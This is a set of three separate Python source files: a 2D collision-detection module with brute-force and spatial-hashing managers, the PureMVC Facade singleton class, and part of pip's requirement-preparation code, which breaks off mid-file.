            `center` : euclid.Vector2
                rectangle center
            `half_width` : float
                half width of rectangle
            `half_height` : float
                half height of rectangle
        """
        self.center = center
        self.rx = half_width
        self.ry = half_height

    def overlaps(self, other):
        dx = abs(self.center[0] - other.center[0])
        dy = abs(self.center[1] - other.center[1])
        return dx < self.rx + other.rx and dy < self.ry + other.ry

    def distance(self, other):
        # per-axis boundary gaps; the larger one is the rect distance,
        # clamped to zero when the rectangles overlap
        gap_x = abs(self.center[0] - other.center[0]) - self.rx - other.rx
        gap_y = abs(self.center[1] - other.center[1]) - self.ry - other.ry
        gap = gap_x if gap_x > gap_y else gap_y
        return gap if gap > 0.0 else 0.0

    def near_than(self, other, near_distance):
        gap_x = abs(self.center[0] - other.center[0]) - self.rx - other.rx
        gap_y = abs(self.center[1] - other.center[1]) - self.ry - other.ry
        return gap_x < near_distance and gap_y < near_distance

    def touches_point(self, x, y):
        return (abs(self.center[0] - x) < self.rx and
                abs(self.center[1] - y) < self.ry)

    def fits_in_box(self, packed_box):
        minx, maxx, miny, maxy = packed_box
        return (minx + self.rx <= self.center[0] <= maxx - self.rx and
                miny + self.ry <= self.center[1] <= maxy - self.ry)

    def minmax(self):
        cx = self.center[0]
        cy = self.center[1]
        return (cx - self.rx, cx + self.rx, cy - self.ry, cy + self.ry)

    def copy(self):
        return AARectShape(eu.Vector2(*self.center), self.rx, self.ry)
###### CollisionManager implementations #######################################
class CollisionManagerBruteForce(object):
    """
    Reference CollisionManager implementation using the simplest code
    possible: every query scans the whole known set.

    Intended for reference and debugging; each query is O(n) and
    iter_all_collisions is O(n**2), so prefer CollisionManagerGrid for
    real workloads.
    Look at CollisionManager for class and method documentation.
    """
    def __init__(self):
        # the set of known collidables
        self.objs = set()

    def add(self, obj):
        #? use weakref ? python 2.7 has weakset
        self.objs.add(obj)

    def remove_tricky(self, obj):
        self.objs.remove(obj)

    def clear(self):
        self.objs.clear()

    def they_collide(self, obj1, obj2):
        return obj1.cshape.overlaps(obj2.cshape)

    def objs_colliding(self, obj):
        f_overlaps = obj.cshape.overlaps
        return [other for other in self.objs if
                (other is not obj) and f_overlaps(other.cshape)]

    def iter_colliding(self, obj):
        f_overlaps = obj.cshape.overlaps
        for other in self.objs:
            if other is not obj and f_overlaps(other.cshape):
                yield other

    def any_near(self, obj, near_distance):
        f_near_than = obj.cshape.near_than
        for other in self.objs:
            if other is not obj and f_near_than(other.cshape, near_distance):
                return other
        return None

    def objs_near(self, obj, near_distance):
        f_near_than = obj.cshape.near_than
        return [other for other in self.objs if
                (other is not obj) and f_near_than(other.cshape, near_distance)]

    def objs_near_wdistance(self, obj, near_distance):
        f_distance = obj.cshape.distance
        res = []
        for other in self.objs:
            if other is obj:
                continue
            d = f_distance(other.cshape)
            if d <= near_distance:
                res.append((other, d))
        return res

    def ranked_objs_near(self, obj, near_distance):
        # bug fix: the original called the bare name 'objs_near_wdistance',
        # which is not defined at module level; the method lives on self,
        # so the unqualified call raised NameError at runtime.
        tmp = self.objs_near_wdistance(obj, near_distance)
        tmp.sort(key=op.itemgetter(1))
        return tmp

    def iter_all_collisions(self):
        # O(n**2): each unordered pair is tested exactly once (j < i)
        for i, obj in enumerate(self.objs):
            f_overlaps = obj.cshape.overlaps
            for j, other in enumerate(self.objs):
                if j >= i:
                    break
                if f_overlaps(other.cshape):
                    yield (obj, other)

    def knows(self, obj):
        return obj in self.objs

    def known_objs(self):
        return self.objs

    def objs_touching_point(self, x, y):
        touching = set()
        for obj in self.objs:
            if obj.cshape.touches_point(x, y):
                touching.add(obj)
        return touching

    def objs_into_box(self, minx, maxx, miny, maxy):
        into = set()
        packed_box = minx, maxx, miny, maxy
        for obj in self.objs:
            if obj.cshape.fits_in_box(packed_box):
                into.add(obj)
        return into
class CollisionManagerGrid(object):
    """
    Implements the CollisionManager interface based on the scheme known
    as spatial hashing.

    The idea behind is to divide the space in rectangles with a given
    width and height, and have a table telling which objects potentially
    overlap each rectangle.  Later, when the question 'which known
    objects have such and such spatial relation with <some object>'
    arrives, only the objects in the rectangles overlapping <some object>
    (or nearby ones) need to be examined for the condition.
    Look at CollisionManager for class and method documentation.
    """
    def __init__(self, xmin, xmax, ymin, ymax, cell_width, cell_height):
        """
        Cell width and height have impact on performance.
        For objects with the same width, and with width == height, a good
        value is 1.25 * (object width).
        For mixed widths, a good guess can be
        ~ 1.25 * max{ width(object) : all objects not exceptionally big }

        :Parameters:
            `xmin` : float
                minimum x coordinate for a point in world
            `xmax` : float
                maximum x coordinate for a point in world
            `ymin` : float
                minimum y coordinate for a point in world
            `ymax` : float
                maximum y coordinate for a point in world
            `cell_width` : float
                width of the rectangles the space will be broken into
            `cell_height` : float
                height of the rectangles the space will be broken into
        """
        self.xmin = xmin
        self.xmax = xmax
        self.ymin = ymin
        self.ymax = ymax
        self.cell_width = cell_width
        self.cell_height = cell_height
        cols = int(math.ceil((xmax - xmin) / float(cell_width)))
        rows = int(math.ceil((ymax - ymin) / float(cell_height)))
        self.cols = cols
        self.rows = rows
        numbuckets = cols * rows
        # buckets maps cell identifier -> objs that potentially overlap the cell
        # ('range' instead of py2-only 'xrange' so the code runs on python 3;
        # behavior is identical, py2 just builds the list eagerly)
        self.buckets = [set() for k in range(numbuckets)]

    def add(self, obj):
        # add to any bucket it overlaps;
        # for the collision logic it is fine if some non-overlapping buckets
        # are included; this allows a faster cell selection at the cost of
        # potentially some extra buckets
        for cell_idx in self._iter_cells_for_aabb(obj.cshape.minmax()):
            self.buckets[cell_idx].add(obj)

    def remove_tricky(self, obj):
        # obj.cshape must be unchanged since 'add', else the bucket lookup
        # will miss cells and leak references (see CollisionManager docs)
        for cell_idx in self._iter_cells_for_aabb(obj.cshape.minmax()):
            self.buckets[cell_idx].remove(obj)

    def clear(self):
        for bucket in self.buckets:
            bucket.clear()

    def they_collide(self, obj1, obj2):
        return obj1.cshape.overlaps(obj2.cshape)

    def objs_colliding(self, obj):
        aabb = obj.cshape.minmax()
        f_overlaps = obj.cshape.overlaps
        collides = set()
        # seed with obj itself so it is never re-tested nor reported
        collides.add(obj)
        # brute force against the others in all the buckets obj overlaps
        for cell_id in self._iter_cells_for_aabb(aabb):
            for other in self.buckets[cell_id]:
                if other not in collides and f_overlaps(other.cshape):
                    collides.add(other)
        collides.remove(obj)
        return collides

    def iter_colliding(self, obj):
        aabb = obj.cshape.minmax()
        f_overlaps = obj.cshape.overlaps
        # 'seen' prevents double-yields for objects present in several buckets
        seen = set()
        seen.add(obj)
        for cell_id in self._iter_cells_for_aabb(aabb):
            for other in self.buckets[cell_id]:
                if (other not in seen) and f_overlaps(other.cshape):
                    seen.add(other)
                    yield other

    def any_near(self, obj, near_distance):
        # inflate the AABB by near_distance so all candidate buckets are seen
        minx, maxx, miny, maxy = obj.cshape.minmax()
        minx -= near_distance
        maxx += near_distance
        miny -= near_distance
        maxy += near_distance
        f_distance = obj.cshape.distance
        for cell_id in self._iter_cells_for_aabb((minx, maxx, miny, maxy)):
            for other in self.buckets[cell_id]:
                if other is not obj and f_distance(other.cshape) < near_distance:
                    return other
        return None

    def objs_near(self, obj, near_distance):
        minx, maxx, miny, maxy = obj.cshape.minmax()
        minx -= near_distance
        maxx += near_distance
        miny -= near_distance
        maxy += near_distance
        f_distance = obj.cshape.distance
        collides = set()
        # brute force against others in all buckets the inflated aabb overlaps
        for cell_id in self._iter_cells_for_aabb((minx, maxx, miny, maxy)):
            for other in self.buckets[cell_id]:
                if (other not in collides and
                    (f_distance(other.cshape) < near_distance)):
                    collides.add(other)
        # bug fix: was collides.remove(obj), which raised KeyError when obj
        # was not a known object - the CollisionManager contract explicitly
        # allows querying with unknown objects (cf. objs_colliding, which
        # pre-seeds the set with obj); discard is a no-op in that case
        collides.discard(obj)
        return collides

    def objs_near_wdistance(self, obj, near_distance):
        minx, maxx, miny, maxy = obj.cshape.minmax()
        minx -= near_distance
        maxx += near_distance
        miny -= near_distance
        maxy += near_distance
        f_distance = obj.cshape.distance
        # dict keyed by object dedups candidates seen in several buckets;
        # obj is pre-seeded so it is never distance-tested against itself
        collides = {}
        collides[obj] = 0.0
        for cell_id in self._iter_cells_for_aabb((minx, maxx, miny, maxy)):
            for other in self.buckets[cell_id]:
                if other not in collides:
                    d = f_distance(other.cshape)
                    if d <= near_distance:
                        collides[other] = d
        del collides[obj]
        return list(collides.items())

    def ranked_objs_near(self, obj, near_distance):
        tmp = self.objs_near_wdistance(obj, near_distance)
        tmp.sort(key=op.itemgetter(1))
        return tmp

    def iter_all_collisions(self):
        # uses the fact: 'a collides b' iff there is a bucket B with
        # a in B, b in B and 'a collides b'; known_collisions dedups pairs
        # that share more than one bucket
        known_collisions = set()
        for bucket in self.buckets:
            for i, obj in enumerate(bucket):
                f_overlaps = obj.cshape.overlaps
                for j, other in enumerate(bucket):
                    if j >= i:
                        break
                    if f_overlaps(other.cshape):
                        if id(obj) < id(other):
                            coll_id = (id(obj), id(other))
                        else:
                            coll_id = (id(other), id(obj))
                        if coll_id not in known_collisions:
                            known_collisions.add(coll_id)
                            yield (obj, other)

    def knows(self, obj):
        for bucket in self.buckets:
            if obj in bucket:
                return True
        return False

    def known_objs(self):
        objs = set()
        for bucket in self.buckets:
            objs |= bucket
        return objs

    def objs_touching_point(self, x, y):
        touching = set()
        for cell_id in self._iter_cells_for_aabb((x, x, y, y)):
            for obj in self.buckets[cell_id]:
                if obj.cshape.touches_point(x, y):
                    touching.add(obj)
        return touching

    def objs_into_box(self, minx, maxx, miny, maxy):
        into = set()
        buckets = self.buckets
        packed_box = (minx, maxx, miny, maxy)
        for cell_idx in self._iter_cells_for_aabb(packed_box):
            for obj in buckets[cell_idx]:
                if (obj not in into) and (obj.cshape.fits_in_box(packed_box)):
                    into.add(obj)
        return into

    def _iter_cells_for_aabb(self, aabb):
        # yields the ids of all buckets overlapping the rectangle aabb
        minx, maxx, miny, maxy = aabb
        ix_lo = int(math.floor((minx - self.xmin) / self.cell_width))
        ix_sup = int(math.ceil((maxx - self.xmin) / self.cell_width))
        iy_lo = int(math.floor((miny - self.ymin) / self.cell_height))
        iy_sup = int(math.ceil((maxy - self.ymin) / self.cell_height))
        # disregard cells outside the world; they can come from 'near' queries
        if ix_lo < 0:
            ix_lo = 0
        if ix_sup > self.cols:
            ix_sup = self.cols
        if iy_lo < 0:
            iy_lo = 0
        if iy_sup > self.rows:
            iy_sup = self.rows
        for iy in range(iy_lo, iy_sup):
            contrib_y = iy * self.cols
            for ix in range(ix_lo, ix_sup):
                yield ix + contrib_y
| |
"""
PureMVC Python Port by Toby de Havilland <toby.de.havilland@puremvc.org>
PureMVC - Copyright(c) 2006-08 Futurescale, Inc., Some rights reserved.
Your reuse is governed by the Creative Commons Attribution 3.0 License
"""
import puremvc.core
import puremvc.interfaces
import puremvc.patterns.observer
class Facade(object, puremvc.interfaces.IFacade):
    """
    A base Singleton C{IFacade} implementation.

    In PureMVC, the C{Facade} class assumes these responsibilities:

    - Initializing the C{Model}, C{View} and C{Controller} Singletons.
    - Providing all the methods defined by the C{IModel, IView, & IController} interfaces.
    - Providing the ability to override the specific C{Model}, C{View} and C{Controller} Singletons created.
    - Providing a single point of contact to the application for registering C{Commands} and notifying C{Observers}.

    @see: L{Model<org.puremvc.as3.core.model.Model>}
    @see: L{View<org.puremvc.as3.core.view.View>}
    @see: L{Controller<org.puremvc.as3.core.controller.Controller>}
    @see: L{Notification<org.puremvc.as3.patterns.observer.Notification>}
    @see: L{Mediator<org.puremvc.as3.patterns.mediator.Mediator>}
    @see: L{Proxy<org.puremvc.as3.patterns.proxy.Proxy>}
    @see: L{SimpleCommand<org.puremvc.as3.patterns.command.SimpleCommand>}
    @see: L{MacroCommand<org.puremvc.as3.patterns.command.MacroCommand>}
    """

    # Singleton instance and the three core actors, stored at class level.
    instance = None
    controller = None
    model = None
    view = None

    def __new__(cls, *args, **kwargs):
        """
        This C{IFacade} implementation is a Singleton, so you should not call
        the constructor directly, but instead call the static Singleton
        method C{Facade.getInstance()}.
        """
        if not cls.instance or not isinstance(cls.instance, cls):
            # Bug fix: do not forward *args/**kwargs to object.__new__() -
            # it raises TypeError for extra arguments on Python 3 (and only
            # ignored them, with a deprecation, on Python 2). Constructor
            # arguments still reach __init__ via the normal protocol.
            cls.instance = super(Facade, cls).__new__(cls)
            cls.instance.initializeFacade()
        return cls.instance

    @staticmethod
    def getInstance():
        """
        C{Facade} Singleton Static method.

        @return: the Singleton instance of C{Facade}
        """
        return Facade()

    def initializeFacade(self):
        """
        Initialize the Singleton C{Facade} instance.

        Called automatically by the constructor. Override in your subclass
        to do any subclass specific initializations. Be sure to call
        C{Facade.initializeFacade()}, though.
        """
        self.initializeController()
        self.initializeModel()
        self.initializeView()

    def initializeController(self):
        """
        Initialize the C{Controller}.

        Called by the C{initializeFacade} method. Override this method in
        your subclass of C{Facade} if you wish to initialize a different
        C{IController}, or have C{Commands} to register with the
        C{Controller} at startup. If you do override, call
        C{super.initializeController()} at the beginning of your method.
        """
        # idempotent: keep an already-initialized controller
        if (self.controller is not None):
            return
        self.controller = puremvc.core.Controller.getInstance()

    def initializeModel(self):
        """
        Initialize the C{Model}.

        Called by the C{initializeFacade} method. Override this method in
        your subclass of C{Facade} if you wish to initialize a different
        C{IModel}, or have C{Proxy}s to register with the Model that do not
        retrieve a reference to the Facade at construction time. If you do
        override, call C{super.initializeModel()} at the beginning of your
        method, then register C{Proxy}s.

        Note: This method is I{rarely} overridden; in practice you are more
        likely to use a C{Command} to create and register C{Proxy}s with
        the C{Model}, since C{Proxy}s with mutable data will likely need to
        send C{INotification}s and thus will likely want to fetch a
        reference to the C{Facade} during their construction.
        """
        if (self.model is not None):
            return
        self.model = puremvc.core.Model.getInstance()

    def initializeView(self):
        """
        Initialize the C{View}.

        Called by the C{initializeFacade} method. Override this method in
        your subclass of C{Facade} if you wish to initialize a different
        C{IView}, or have C{Observers} to register with the C{View}. If you
        do override, call C{super.initializeView()} at the beginning of
        your method, then register C{IMediator} instances.

        Note: This method is I{rarely} overridden; in practice you are more
        likely to use a C{Command} to create and register C{Mediator}s with
        the C{View}, since C{IMediator} instances will need to send
        C{INotification}s and thus will likely want to fetch a reference to
        the C{Facade} during their construction.
        """
        if (self.view is not None):
            return
        self.view = puremvc.core.View.getInstance()

    def registerCommand(self, notificationName, commandClassRef):
        """
        Register an C{ICommand} with the C{Controller} by Notification name.

        @param notificationName: the name of the C{INotification} to associate the C{ICommand} with
        @param commandClassRef: a reference to the Class of the C{ICommand}
        """
        self.controller.registerCommand(notificationName, commandClassRef)

    def removeCommand(self, notificationName):
        """
        Remove a previously registered C{ICommand} to C{INotification} mapping from the Controller.

        @param notificationName: the name of the C{INotification} to remove the C{ICommand} mapping for
        """
        self.controller.removeCommand(notificationName)

    def hasCommand(self, notificationName):
        """
        Check if a Command is registered for a given Notification.

        @param notificationName: the name of the C{INotification}
        @return: whether a Command is currently registered for the given C{notificationName}.
        """
        return self.controller.hasCommand(notificationName)

    def registerProxy(self, proxy):
        """
        Register an C{IProxy} with the C{Model} by name.

        @param proxy: the C{IProxy} instance to be registered with the C{Model}.
        """
        self.model.registerProxy(proxy)

    def retrieveProxy(self, proxyName):
        """
        Retrieve an C{IProxy} from the C{Model} by name.

        @param proxyName: the name of the proxy to be retrieved.
        @return: the C{IProxy} instance previously registered with the given C{proxyName}.
        """
        return self.model.retrieveProxy(proxyName)

    def removeProxy(self, proxyName):
        """
        Remove an C{IProxy} from the C{Model} by name.

        @param proxyName: the C{IProxy} to remove from the C{Model}.
        @return: the C{IProxy} that was removed from the C{Model}, or None
            when the C{Model} is not initialized.
        """
        proxy = None
        if (self.model is not None):
            proxy = self.model.removeProxy(proxyName)
        return proxy

    def hasProxy(self, proxyName):
        """
        Check if a Proxy is registered.

        @param proxyName: the name of the C{IProxy}
        @return: whether a Proxy is currently registered with the given C{proxyName}.
        """
        return self.model.hasProxy(proxyName)

    def registerMediator(self, mediator):
        """
        Register a C{IMediator} with the C{View}.

        @param mediator: a reference to the C{IMediator}
        """
        if (self.view is not None):
            self.view.registerMediator(mediator)

    def retrieveMediator(self, mediatorName):
        """
        Retrieve an C{IMediator} from the C{View}.

        @param mediatorName: the name of the C{IMediator}
        @return: the C{IMediator} previously registered with the given C{mediatorName}.
        """
        return self.view.retrieveMediator(mediatorName)

    def removeMediator(self, mediatorName):
        """
        Remove an C{IMediator} from the C{View}.

        @param mediatorName: name of the C{IMediator} to be removed.
        @return: the C{IMediator} that was removed from the C{View}, or
            None when the C{View} is not initialized.
        """
        mediator = None
        if (self.view is not None):
            mediator = self.view.removeMediator(mediatorName)
        return mediator

    def hasMediator(self, mediatorName):
        """
        Check if a Mediator is registered or not.

        @param mediatorName: the name of the C{IMediator}
        @return: whether a Mediator is registered with the given C{mediatorName}.
        """
        return self.view.hasMediator(mediatorName)

    def sendNotification(self, notificationName, body=None, type=None):
        """
        Create and send an C{INotification}.

        Keeps us from having to construct new notification instances in
        our implementation code.

        @param notificationName: the name of the notification to send
        @param body: the body of the notification (optional)
        @param type: the type of the notification (optional)
        """
        self.notifyObservers(puremvc.patterns.observer.Notification(notificationName, body, type))

    def notifyObservers(self, notification):
        """
        Notify C{Observer}s.

        This method is left public mostly for backward compatibility, and
        to allow you to send custom notification classes using the facade.
        Usually you should just call sendNotification and pass the
        parameters, never having to construct the notification yourself.

        @param notification: the C{INotification} to have the C{View} notify C{Observers} of.
        """
        if (self.view is not None):
            self.view.notifyObservers(notification)
| |
"""Prepares a distribution for installation
"""
# The following comment should be removed at some point in the future.
# mypy: strict-optional=False
import logging
import mimetypes
import os
import shutil
from typing import Dict, Iterable, List, Optional
from pip._vendor.packaging.utils import canonicalize_name
from pip._internal.distributions import make_distribution_for_install_requirement
from pip._internal.distributions.installed import InstalledDistribution
from pip._internal.exceptions import (
DirectoryUrlHashUnsupported,
HashMismatch,
HashUnpinned,
InstallationError,
NetworkConnectionError,
PreviousBuildDirError,
VcsHashUnsupported,
)
from pip._internal.index.package_finder import PackageFinder
from pip._internal.metadata import BaseDistribution
from pip._internal.models.link import Link
from pip._internal.models.wheel import Wheel
from pip._internal.network.download import BatchDownloader, Downloader
from pip._internal.network.lazy_wheel import (
HTTPRangeRequestUnsupported,
dist_from_wheel_url,
)
from pip._internal.network.session import PipSession
from pip._internal.req.req_install import InstallRequirement
from pip._internal.req.req_tracker import RequirementTracker
from pip._internal.utils.filesystem import copy2_fixed
from pip._internal.utils.hashes import Hashes, MissingHashes
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import display_path, hide_url, is_installable_dir, rmtree
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.unpacking import unpack_file
from pip._internal.vcs import vcs
logger = logging.getLogger(__name__)
def _get_prepared_distribution(
    req: InstallRequirement,
    req_tracker: RequirementTracker,
    finder: PackageFinder,
    build_isolation: bool,
) -> BaseDistribution:
    """Prepare a distribution for installation.

    Builds the requirement's metadata under the requirement tracker and
    returns the resulting distribution object.
    """
    dist = make_distribution_for_install_requirement(req)
    with req_tracker.track(req):
        dist.prepare_distribution_metadata(finder, build_isolation)
    return dist.get_metadata_distribution()
def unpack_vcs_link(link: Link, location: str, verbosity: int) -> None:
    """Fetch the tree behind a VCS *link* into *location*."""
    backend = vcs.get_backend_for_scheme(link.scheme)
    assert backend is not None
    backend.unpack(location, url=hide_url(link.url), verbosity=verbosity)
class File:
    """A local file path paired with its MIME content type."""

    def __init__(self, path: str, content_type: Optional[str]) -> None:
        self.path = path
        # When the caller does not know the content type, infer it from
        # the file name; guess_type returns None for unknown extensions.
        if content_type is not None:
            self.content_type = content_type
        else:
            self.content_type = mimetypes.guess_type(path)[0]
def get_http_url(
    link: Link,
    download: Downloader,
    download_dir: Optional[str] = None,
    hashes: Optional[Hashes] = None,
) -> File:
    """Obtain the file behind an http(s) *link*, downloading if needed.

    When *download_dir* already holds the file, that copy is used and no
    download happens; otherwise the file is fetched into a temp dir and
    checked against *hashes* (when given).
    """
    # Created unconditionally (as in the original flow) so the globally
    # managed temp dir is always registered for cleanup.
    temp_dir = TempDirectory(kind="unpack", globally_managed=True)
    already_downloaded_path = None
    if download_dir:
        already_downloaded_path = _check_download_dir(link, download_dir, hashes)
    if already_downloaded_path:
        # Cached copy: no content type is recorded for it.
        return File(already_downloaded_path, None)
    from_path, content_type = download(link, temp_dir.path)
    if hashes:
        hashes.check_against_path(from_path)
    return File(from_path, content_type)
def _copy2_ignoring_special_files(src: str, dest: str) -> None:
    """Copy *src* to *dest*, logging and skipping special files.

    Copying special files is not supported, but as a convenience to users
    we skip errors copying them. This supports tools that may create e.g.
    socket files in the project source directory. Since the destination
    directory is deleted prior to the copy, any SpecialFileError is assumed
    to be caused by the source and is therefore only logged.
    """
    try:
        copy2_fixed(src, dest)
    except shutil.SpecialFileError as exc:
        logger.warning(
            "Ignoring special file error '%s' encountered copying %s to %s.",
            str(exc),
            src,
            dest,
        )
def _copy_source_tree(source: str, target: str) -> None:
    """Recursively copy *source* into *target*, skipping problem directories."""
    target_abspath = os.path.abspath(target)
    target_basename = os.path.basename(target_abspath)
    target_dirname = os.path.dirname(target_abspath)

    def ignore(directory: str, names: List[str]) -> List[str]:
        # Entries returned here are excluded from the copy.
        excluded: List[str] = []
        if directory == source:
            # Pulling in those directories can potentially be very slow, so
            # exclude .tox/.nox when they appear at the top level (and only
            # there). See discussion at https://github.com/pypa/pip/pull/6770
            excluded.extend((".tox", ".nox"))
        if os.path.abspath(directory) == target_dirname:
            # Prevent an infinite recursion if the target is in source.
            # This can happen when TMPDIR is set to ${PWD}/...
            # and we copy PWD to TMPDIR.
            excluded.append(target_basename)
        return excluded

    shutil.copytree(
        source,
        target,
        ignore=ignore,
        symlinks=True,
        copy_function=_copy2_ignoring_special_files,
    )
def get_file_url(
    link: Link, download_dir: Optional[str] = None, hashes: Optional[Hashes] = None
) -> File:
    """Get file and optionally check its hash."""
    # Prefer a previously downloaded (and hash-valid) copy when one exists.
    cached_path = (
        _check_download_dir(link, download_dir, hashes) if download_dir else None
    )
    from_path = cached_path if cached_path else link.file_path
    # If --require-hashes is off, `hashes` is either empty, the
    # link's embedded hash, or MissingHashes; it is required to
    # match. If --require-hashes is on, we are satisfied by any
    # hash in `hashes` matching: a URL-based or an option-based
    # one; no internet-sourced hash will be in `hashes`.
    if hashes:
        hashes.check_against_path(from_path)
    return File(from_path, None)
def unpack_url(
    link: Link,
    location: str,
    download: Downloader,
    verbosity: int,
    download_dir: Optional[str] = None,
    hashes: Optional[Hashes] = None,
) -> Optional[File]:
    """Unpack link into location, downloading if required.

    Returns the fetched :class:`File`, or None for VCS links and existing
    directories (which have nothing to return).

    :param hashes: A Hashes object, one of whose embedded hashes must match,
        or HashMismatch will be raised. If the Hashes is empty, no matches are
        required, and unhashable types of requirements (like VCS ones, which
        would ordinarily raise HashUnsupported) are allowed.
    """
    # Non-editable VCS URLs are checked out directly.
    if link.is_vcs:
        unpack_vcs_link(link, location, verbosity=verbosity)
        return None

    # Once out-of-tree-builds are no longer supported, could potentially
    # replace the below condition with `assert not link.is_existing_dir`
    # - unpack_url does not need to be called for in-tree-builds.
    # As further cleanup, _copy_source_tree and accompanying tests can be
    # removed. TODO when use-deprecated=out-of-tree-build is removed.
    if link.is_existing_dir():
        if os.path.isdir(location):
            rmtree(location)
        _copy_source_tree(link.file_path, location)
        return None

    # file:// URLs resolve locally; everything else is fetched over HTTP.
    if link.is_file:
        fetched = get_file_url(link, download_dir, hashes=hashes)
    else:
        fetched = get_http_url(
            link,
            download,
            download_dir,
            hashes=hashes,
        )

    # Unpack the archive to the build dir location. Even when only
    # downloading archives, they have to be unpacked to parse dependencies —
    # except wheels, which are left packed.
    if not link.is_wheel:
        unpack_file(fetched.path, location, fetched.content_type)
    return fetched
def _check_download_dir(
    link: Link, download_dir: str, hashes: Optional[Hashes]
) -> Optional[str]:
    """Return the path of a previously downloaded copy of *link*, if valid.

    A cached file whose hash does not match *hashes* is deleted and None is
    returned; None is also returned when no cached file exists.
    """
    candidate = os.path.join(download_dir, link.filename)
    if not os.path.exists(candidate):
        return None

    # A file is already there: verify its hash before trusting it.
    logger.info("File was already downloaded %s", candidate)
    if hashes:
        try:
            hashes.check_against_path(candidate)
        except HashMismatch:
            logger.warning(
                "Previously-downloaded file %s has bad hash. Re-downloading.",
                candidate,
            )
            os.unlink(candidate)
            return None
    return candidate
class RequirementPreparer:
    """Prepares a Requirement: fetch/unpack its link (or reuse what is
    installed/cached) and produce a BaseDistribution for the resolver."""

    def __init__(
        self,
        build_dir: str,
        download_dir: Optional[str],
        src_dir: str,
        build_isolation: bool,
        req_tracker: RequirementTracker,
        session: PipSession,
        progress_bar: str,
        finder: PackageFinder,
        require_hashes: bool,
        use_user_site: bool,
        lazy_wheel: bool,
        verbosity: int,
        in_tree_build: bool,
    ) -> None:
        super().__init__()

        self.src_dir = src_dir
        self.build_dir = build_dir
        self.req_tracker = req_tracker
        self._session = session
        self._download = Downloader(session, progress_bar)
        self._batch_download = BatchDownloader(session, progress_bar)
        self.finder = finder

        # Where still-packed archives should be written to. If None, they are
        # not saved, and are deleted immediately after unpacking.
        self.download_dir = download_dir

        # Is build isolation allowed?
        self.build_isolation = build_isolation

        # Should hash-checking be required?
        self.require_hashes = require_hashes

        # Should install in user site-packages?
        self.use_user_site = use_user_site

        # Should wheels be downloaded lazily?
        self.use_lazy_wheel = lazy_wheel

        # How verbose should underlying tooling be?
        self.verbosity = verbosity

        # Should in-tree builds be used for local paths?
        self.in_tree_build = in_tree_build

        # Memoized downloaded files, as mapping of url: path.
        self._downloaded: Dict[str, str] = {}

        # Previous "header" printed for a link-based InstallRequirement
        self._previous_requirement_header = ("", "")

    def _log_preparing_link(self, req: InstallRequirement) -> None:
        """Provide context for the requirement being prepared."""
        if req.link.is_file and not req.original_link_is_in_wheel_cache:
            message = "Processing %s"
            information = str(display_path(req.link.file_path))
        else:
            message = "Collecting %s"
            information = str(req.req or req)

        # Only emit the header when it differs from the previous one, so
        # repeated preparations of the same requirement stay quiet.
        if (message, information) != self._previous_requirement_header:
            self._previous_requirement_header = (message, information)
            logger.info(message, information)

        if req.original_link_is_in_wheel_cache:
            with indent_log():
                logger.info("Using cached %s", req.link.filename)

    def _ensure_link_req_src_dir(
        self, req: InstallRequirement, parallel_builds: bool
    ) -> None:
        """Ensure source_dir of a linked InstallRequirement."""
        # Since source_dir is only set for editable requirements.
        if req.link.is_wheel:
            # We don't need to unpack wheels, so no need for a source
            # directory.
            return
        assert req.source_dir is None
        if req.link.is_existing_dir() and self.in_tree_build:
            # build local directories in-tree
            req.source_dir = req.link.file_path
            return

        # We always delete unpacked sdists after pip runs.
        req.ensure_has_source_dir(
            self.build_dir,
            autodelete=True,
            parallel_builds=parallel_builds,
        )

        # If a checkout exists, it's unwise to keep going. version
        # inconsistencies are logged later, but do not fail the
        # installation.
        # FIXME: this won't upgrade when there's an existing
        # package unpacked in `req.source_dir`
        # TODO: this check is now probably dead code
        if is_installable_dir(req.source_dir):
            # BUGFIX: added the missing space after "a" (the original
            # concatenation produced "apre-existing") and fixed "failed .".
            raise PreviousBuildDirError(
                "pip can't proceed with requirements '{}' due to a "
                "pre-existing build directory ({}). This is likely "
                "due to a previous installation that failed. pip is "
                "being responsible and not assuming it can delete this. "
                "Please delete it and try again.".format(req, req.source_dir)
            )

    def _get_linked_req_hashes(self, req: InstallRequirement) -> Hashes:
        """Return the Hashes the linked requirement must satisfy.

        Raises the appropriate hash-related error for requirement kinds that
        cannot be hashed when hash-checking is required.
        """
        # By the time this is called, the requirement's link should have
        # been checked so we can tell what kind of requirements req is
        # and raise some more informative errors than otherwise.
        # (For example, we can raise VcsHashUnsupported for a VCS URL
        # rather than HashMissing.)
        if not self.require_hashes:
            return req.hashes(trust_internet=True)

        # We could check these first 2 conditions inside unpack_url
        # and save repetition of conditions, but then we would
        # report less-useful error messages for unhashable
        # requirements, complaining that there's no hash provided.
        if req.link.is_vcs:
            raise VcsHashUnsupported()
        if req.link.is_existing_dir():
            raise DirectoryUrlHashUnsupported()

        # Unpinned packages are asking for trouble when a new version
        # is uploaded. This isn't a security check, but it saves users
        # a surprising hash mismatch in the future.
        # file:/// URLs aren't pinnable, so don't complain about them
        # not being pinned.
        if req.original_link is None and not req.is_pinned:
            raise HashUnpinned()

        # If known-good hashes are missing for this requirement,
        # shim it with a facade object that will provoke hash
        # computation and then raise a HashMissing exception
        # showing the user what the hash should be.
        return req.hashes(trust_internet=False) or MissingHashes()

    def _fetch_metadata_using_lazy_wheel(
        self,
        link: Link,
    ) -> Optional[BaseDistribution]:
        """Fetch metadata using lazy wheel, if possible."""
        if not self.use_lazy_wheel:
            return None
        if self.require_hashes:
            logger.debug("Lazy wheel is not used as hash checking is required")
            return None
        if link.is_file or not link.is_wheel:
            # BUGFIX: "does not points" -> "does not point" in the log text.
            logger.debug(
                "Lazy wheel is not used as %r does not point to a remote wheel",
                link,
            )
            return None

        wheel = Wheel(link.filename)
        name = canonicalize_name(wheel.name)
        logger.info(
            "Obtaining dependency information from %s %s",
            name,
            wheel.version,
        )
        # Strip the fragment (e.g. an embedded hash) before range requests.
        url = link.url.split("#", 1)[0]
        try:
            return dist_from_wheel_url(name, url, self._session)
        except HTTPRangeRequestUnsupported:
            logger.debug("%s does not support range requests", url)
            return None

    def _complete_partial_requirements(
        self,
        partially_downloaded_reqs: Iterable[InstallRequirement],
        parallel_builds: bool = False,
    ) -> None:
        """Download any requirements which were only fetched by metadata."""
        # Download to a temporary directory. These will be copied over as
        # needed for downstream 'download', 'wheel', and 'install' commands.
        temp_dir = TempDirectory(kind="unpack", globally_managed=True).path

        # Map each link to the requirement that owns it. This allows us to set
        # `req.local_file_path` on the appropriate requirement after passing
